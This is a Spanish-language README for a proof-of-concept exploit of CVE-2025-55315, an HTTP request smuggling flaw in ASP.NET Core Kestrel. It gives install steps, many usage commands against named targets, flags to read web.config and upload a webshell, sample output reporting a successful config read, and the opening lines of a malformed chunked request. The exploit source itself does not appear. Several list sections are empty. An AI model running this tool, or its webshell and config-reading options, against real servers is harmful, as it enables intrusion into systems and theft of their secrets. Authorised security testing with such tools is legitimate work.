
Exploit PoC de CVE-2025-55315
Herramienta de explotación de contrabando de solicitudes HTTP para ASP.NET Core Kestrel
¡ESTA HERRAMIENTA ES SOLO PARA PRUEBAS DE SEGURIDAD AUTORIZADAS!
Herramienta profesional de pruebas de penetración para CVE-2025-55315 (vulnerabilidad de contrabando de solicitudes HTTP en ASP.NET Core Kestrel). Esta herramienta está diseñada para el análisis de un único objetivo con capacidades integrales de explotación.
Una vulnerabilidad crítica de contrabando de solicitudes HTTP en el servidor web ASP.NET Core Kestrel (CVSS 9.9/10) que permite a los atacantes:
Versiones afectadas:
# Python 3.7 or higher
python3 --version
# No external dependencies - uses only standard library
# Clone or download the tool
git clone https://github.com/ZemarKhos/CVE-2025-55315-PoC-Exploit.git
cd CVE-2025-55315-PoC-Exploit
# Make executable
chmod +x cve_2025_55315_PoC.py
python3 cve_2025_55315_PoC.py -t target.com
Esto:
python3 cve_2025_55315_PoC.py -t target.com -e /api/login
python3 cve_2025_55315_PoC.py -t target.com --read-config -o report.txt
python3 cve_2025_55315_PoC.py \
-t target.com \
--read-config \
--upload-shell \
-v \
-o full_report.txt
Escenario: Comprobar si el servidor de producción es vulnerable
python3 cve_2025_55315_PoC.py -t api.mycompany.com
Duración esperada: 30-60 segundos
Escenario: Escaneo integral de endpoints con salida detallada (verbose)
python3 cve_2025_55315_PoC.py -t api.mycompany.com -v -o scan_results.txt
Duración esperada: 2-5 minutos
Escenario: Probar endpoints críticos específicos
python3 cve_2025_55315_PoC.py \
-t api.mycompany.com \
-e /api/payment/process \
-e /api/admin/users \
-e /api/internal/config \
-o critical_endpoints.txt
Escenario: Probar un servidor HTTP interno
python3 cve_2025_55315_PoC.py \
-t internal-api.local \
-p 8080 \
--no-ssl
usage: cve_2025_55315_PoC.py [-h] -t TARGET [-p PORT] [-e ENDPOINT]
[--no-ssl] [--read-config] [--upload-shell]
[-o OUTPUT] [-v] [--timeout TIMEOUT]
Required Arguments:
-t, --target Target hostname or URL (e.g., target.com)
Optional Arguments:
-p, --port Port number (default: 443 for SSL, 80 for non-SSL)
-e, --endpoint Specific endpoint(s) to test (can be used multiple times)
--no-ssl Disable SSL/HTTPS (use HTTP)
--read-config Attempt to read web.config file
--upload-shell Attempt webshell upload (requires confirmation)
-o, --output Save report to file
-v, --verbose Enable verbose output
--timeout Socket timeout in seconds (default: 10)
-h, --help Show help message
Target: old-api.company.com:443
Vulnerable: YES - CRITICAL
--- Server Information ---
server: Kestrel/8.0.15
kestrel_detected: True
http_version: 1.1
--- VULNERABLE ENDPOINTS (2) ---
✗ /api/login
Details: Request smuggling successful - multiple responses
✗ /api/health
Details: Request smuggling successful - multiple responses
--- SUCCESSFUL EXPLOITS ---
✓ web.config_read via /api/login
Interpretación:
Target: new-api.company.com:443
Vulnerable: NO - SECURE
--- Server Information ---
server: Kestrel/9.0.10
kestrel_detected: True
http_version: 1.1
[SUCCESS] ✓ Endpoint NOT vulnerable (400 Bad Request)
✓ No vulnerable endpoints found - target may be patched
Interpretación:
Antes de ejecutar esta herramienta, asegúrese de:
La herramienta explota CVE-2025-55315 mediante una codificación de transferencia fragmentada (chunked) malformada:
POST /endpoint HTTP/1.1
Host: target.com
Transfer-Encoding: chunked